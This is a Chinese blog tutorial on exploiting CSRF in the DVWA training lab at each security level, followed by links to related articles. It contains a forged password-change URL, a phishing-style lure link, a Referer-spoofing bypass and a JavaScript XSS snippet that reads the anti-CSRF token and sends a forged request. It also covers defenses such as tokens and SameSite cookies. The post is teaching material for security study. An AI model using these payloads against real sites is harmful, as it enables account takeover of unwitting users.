【web安全】DVWA CSRF漏洞分析与利用

原创 已于 2025-07-17 21:11:16 修改 · 994 阅读 · 29 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络

于 2025-07-13 20:42:49 首次发布

目录

简介

一、CSRF漏洞原理与技术背景

1.1 CSRF攻击机制

1.2 DVWA CSRF模块分析

二、Low级别漏洞分析与利用

2.1 关键代码

2.2 漏洞利用实战

三、Medium级别防护绕过

3.1 关键代码

3.2 绕过技术

四、High级别进阶攻击

4.1 Token防护机制

4.2 结合XSS绕过

五、Impossible级别防护分析

5.1 关键代码

六、CSRF防御最佳实践

七、总结

简介

跨站请求伪造(CSRF)是Web安全领域最常见的高危漏洞之一。本文将以DVWA(Damn Vulnerable Web Application)为实验平台,通过代码审计、漏洞利用和防御方案三个维度,全面解析CSRF漏洞的攻防技术。

一、CSRF漏洞原理与技术背景

1.1 CSRF攻击机制

CSRF(Cross-Site Request Forgery)是一种利用受害者已认证状态的非授权操作攻击。其核心攻击流程为:

  1. 用户登录受信任网站A

  2. 未注销情况下访问恶意网站B

  3. 网站B伪造针对网站A的合法请求

  4. 用户浏览器携带认证信息自动执行该请求

1.2 DVWA CSRF模块分析

DVWA的CSRF模块模拟了密码修改功能,包含四个安全等级:

  • Low:无任何防护

  • Medium:基础Referer检查

  • High:Anti-CSRF Token

  • Impossible:多因素认证

二、Low级别漏洞分析与利用

2.1 关键代码

// dvwa/vulnerabilities/csrf/source/low.php
if( isset( $_GET[ 'Change' ] ) ) {
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];
    
    if( $pass_new == $pass_conf ) {
        // 直接修改密码
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert) or die(...);
    }
}

漏洞点

  • 使用GET方法修改密码

  • 无Token验证

  • 无Referer检查

2.2 漏洞利用实战

攻击步骤

1.输入密码更改时,发现get形式传参

2.构造恶意URL:

http://192.168.21.4/dvwa/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change

3.社工诱导点击:

<a href="http://192.168.21.4/dvwa/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change" >点击领取红包</a>

发现密码已经更改成功

三、Medium级别防护绕过

3.1 关键代码

// medium.php
if( stripos( $_SERVER[ 'HTTP_REFERER' ], $_SERVER[ 'SERVER_NAME' ] ) === false ) {
    die("请求必须来自同一域名");
}

防护机制

  • 检查HTTP Referer头

  • 要求包含服务器名

3.2 绕过技术

正常使用csrf poc已经不能成功更改密码了,提示“That request didn't look correct.”

Referer头伪造,Referer添加网站地址即可进行csrf更改

四、High级别进阶攻击

4.1 Token防护机制

// high.php
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

4.2 结合XSS绕过

// 通过XSS先获取Token
var xhr = new XMLHttpRequest();
xhr.onload = function() {
  var token = this.responseText.match(/user_token' value='(.*?)'/)[1];
  // 构造CSRF请求
  var img = new Image();
  img.src = "http://192.168.21/dvwa/...&user_token="+token;
};
xhr.open("GET", "/dvwa/vulnerabilities/csrf/");
xhr.send();

五、Impossible级别防护分析

5.1 关键代码

// impossible.php
$pass_curr = $_POST[ 'password_current' ];
if( !hash_equals( $user_pass, md5( $pass_curr ) ) ) {
    die("Current password incorrect");
}

防护策略

  1. 强制POST方法

  2. 要求验证当前密码

  3. 使用一次性Token

  4. 密码哈希比对

六、CSRF防御最佳实践

  1. Anti-CSRF Token

    • 每个表单生成唯一Token

    • 服务端严格校验

  2. SameSite Cookie属性

    setcookie('sessionid', 'value', [
  'samesite' => 'Strict',
  'secure' => true
]);

  3. 关键操作二次认证

    • 短信/邮件验证

    • 生物识别

七、总结

安全级别防护措施攻击难度
Low无防护★☆☆☆☆
MediumReferer检查★★☆☆☆
HighCSRF Token★★★☆☆
Impossible多因素认证★★★★★
Web安全CSRF漏洞利用(pikachu)
weixin_44431280的博客
04-06 6954
Web安全CSRF漏洞利用 前言:此篇文章主要记录pikachu靶场漏洞中三种模式的CSRF漏洞利用,此处不对基本原理进行过多赘述,基础可参考文章:Web安全—跨站请求伪造攻击(CSRF漏洞利用场景:攻击者伪造一个正常的请求(通常是一个链接),诱导用户点击,从而在受害者不知情的情况下以受害者的身份去修改用户已经登陆的网站信息。 一:CSRF(GET)用户通过表单提交的数据显示在URL中 1,用户使用账户登录网站,本地生成cookie等身份认证信息 2,黑客登陆网站,抓取网站修改功能的数据包参数
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 2万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
DVWA-CSRF漏洞
sc_Pease的博客
01-29 520
参考:https://blog.csdn.net/qq_44720671/article/details/97393100 一、漏洞简介 1,CSRF:cross-site request forgery跨站请求伪造,一种常见Web攻击。 2,利用场景:攻击者伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击就完成了。 3,XSS比较:csrf是借助用户的权限去完成,而xss是盗取用户权限去进行破坏。 二、查看不同难度的dvwa源代码 1,low难度 查看网页源代码
DVWA系列之18 CSRF漏洞分析
weixin_34205076的博客
12-25 263
下面我们来查看一下low级别的CSRF源码:代码中在获取了$pass_new和$pass_conf这两个变量之后,利用mysql_real_escape_string()函数进行了过滤,这样虽然可以防止SQL注入,但却无法阻止CSRF***,之后这两个变量便被直接代入UPDATE语句中执行了数据库更新操作。下面再来分析一下medium级别的代码:可以看到这里在获取$pass_new和$pass_c...
DVWA——CSRF漏洞
qq_62803993的博客
01-14 447
首先进入初级页面我们知道这是一个修改密码的,当我们输入密码进行修改后,提示修改成功后,我们会发现这也是一个get型提交。那我们就试试直接在地址栏中修改内容,看能否执行成功。(修改内容后,我们复制链接重新打开一个界面,然后输入网址进入页面,出现下图,要注意的是我们必须使用同一个浏览器,因为在访问页面时通常存在cookie认证,否则即使点击了恶意链接也没用。
DVWACSRF漏洞
weixin_56306210的博客
03-17 1578
DVWACSRF漏洞
DVWA CSRF 漏洞实践报告
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
10-13 2338
CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。
网络安全DVWA通关教程:Web漏洞学习实践
最新发布
05-24
文档首先概述了DVWA的功能及其涵盖的十种常见Web攻击模块,包括暴力破解、命令注入、跨站请求伪造(CSRF)、文件包含、文件上传、不安全验证码、弱会话ID、SQL注入(含盲注)、跨站脚本攻击(XSS)及内容安全策略绕...
DVWA-CSRF漏洞【全难度】
ethan18的博客
06-10 305
CSRF漏洞全称是Cross-site Request Forgery,跨站请求伪造。这个漏洞主要的思路是利用了本来就登录在目标网站A的用户,当这些用户点击了相应的伪造网站B后,这些网站中的陷阱就会使用户访问网站A(在用户不知道的情况下),这样就可以借助用户之手,做到列入修改密码之类的操作。
使用dvwa环境进行csrf漏洞练习
DXfighting_的博客
04-14 760
登录dvwa环境,并将等级设为low, 打开csrf看到一个修改密码界面 查看源代码,发现这里只对两次输入的密码是不是相同进行判断,未做任何防护 使用hackerbar发现输入的参数在url中,我们可以利用这个特点 写一个csrf.Php文件, <img src="http://127.0.0.1/DVWA-1.9/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change..
DVWA-—【CSRF漏洞利用
qq_34914659的博客
05-20 1283
1.漏洞介绍 CSRF跨站点请求伪造(Cross—Site Request Forgery),攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。https://www.freebuf.com/articles/web/253838.htmlCSRF和XSS的最大的区别在于,CSRF并没有盗取cookie而是直接利用。 下图...
DVWA靶场笔记之csrf漏洞原理
Alonegrief的博客
11-20 1522
DVWA漏洞源码分析——(三)csrf Csrf原理: Csrf中文称为跨站请求伪造,利用受害者未失效的身份认证信息(cookie,会话等)诱骗其点击恶意链接或者去访问攻击者构造的含有攻击代码的页面,在受害者不知情的情况下,以受害者的身份向服务器发送请求,从而达到一些非法操作(转账,改密)。 Csrf和xss的攻击方式有点相似,但是不同的是: (1) csrf需要登录后才能操作,xss不需要 (2) csrf是请求页面api来时先非法操作,xss是先当前页面植入js脚本来修改页面内容 例子: 这里我们用dv
CSRF漏洞(原理、DVWA实验、修复建议)
coderge's CSDN Blog.
09-20 3852
目录 1 介绍CSRF漏洞 2 CSRF漏洞的原理 3 DVWA CSRF实验过程 3.1 low级别 3.2 medium级别 相关函数说明 3.3 high级别 3.4 impossible级别 4 CSRF漏洞修复建议 1 介绍CSRF漏洞 CSRF (Cross -site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)
csrf漏洞(三)
2302_80280669的博客
08-21 509
若长时间未登录DVWA,无法正常登录。此时可直接访问。
DvwaCsrf攻击笔记
JBlock的博客
10-22 2273
介绍今天笔者便用dvwa漏洞测试环境来探讨一下跨站请求攻击。 Csrf全称为Cross-Site Request Forgery中文解释为跨站请求伪造攻击。Csrf通常XSS结合起来进行利用,一般存在XSS漏洞的网站,很大可能也存在Csrf漏洞。二者最简单的区别就是一个是获得用户信任,一个是获得服务端的信任。生活场景 比如说有一天,你闲来无事在寝室上网,然后打开网页,查看一下自己的银行余e,
【渗透测试】【DVWACSRF
preserphy的博客
08-07 1710
CSRF】 全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRFXSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。...
DVWA靶场之CSRF通关详解
qq_62169455的博客
06-27 4345
CSRF的形成原因主要是由于Web应用程序没有充分验证请求来源的问题。正常的请求必须携带正确的Cookie信息,而攻击者可以构造一个恶意网站,在其中包含一个发送CSRF请求的链接或表单,当用户访问这个网站时,浏览器会自动发送CSRF请求到被攻击的网站,从而实现攻击。这里查看源码,刚刚的low等级比较发现,这里只有一个等级发生了改变,即在传入密码和确认密码参数前先进行了一个if语句的判断,判断里面的内容主要是验证这个访问请求是否从dvwa网站本身发起的,如果不是这个网站发起的请求,后面的操作就不执行。
DVWA csrf漏洞\
07-23
DVWA (Damn Vulnerable Web Application) 是一个专门用于安全测试和漏洞练习的开源Web应用程序。CSRF(Cross-Site Request Forgery)是一种常见的Web应用程序安全漏洞,攻击者可以利用它欺骗用户在未经其许可的情况下执行非预期的操作。 在DVWA中,CSRF漏洞可以用来模拟攻击并测试Web应用程序的安全性。攻击者可以通过构建恶意网页或链接,诱使用户在登录状态下访问该页面或点击该链接,从而执行未经授权的操作。 要利用DVWA中的CSRF漏洞进行攻击,首先需要了解目标应用程序的功能和请求结构。然后,攻击者可以构建一个包含恶意请求的HTML页面,并欺骗用户访问该页面。当用户访问页面时,恶意请求将自动发送到目标应用程序,执行攻击者所期望的操作,比如修改用户密码、发送恶意邮件等。 为了防止CSRF攻击,开发人员可以采取一些措施,如使用随机生成的令牌验证每个请求、检查Referer头等。此外,用户也可以采取一些预防措施,比如不点击来自不信任来源的链接、及时退出登录等。 请注意,CSRF漏洞是一种常见的Web应用程序安全问题,开发人员和用户都应该了解并采取相应的防护措施来保护应用程序和个人信息的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

KP_0x01

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值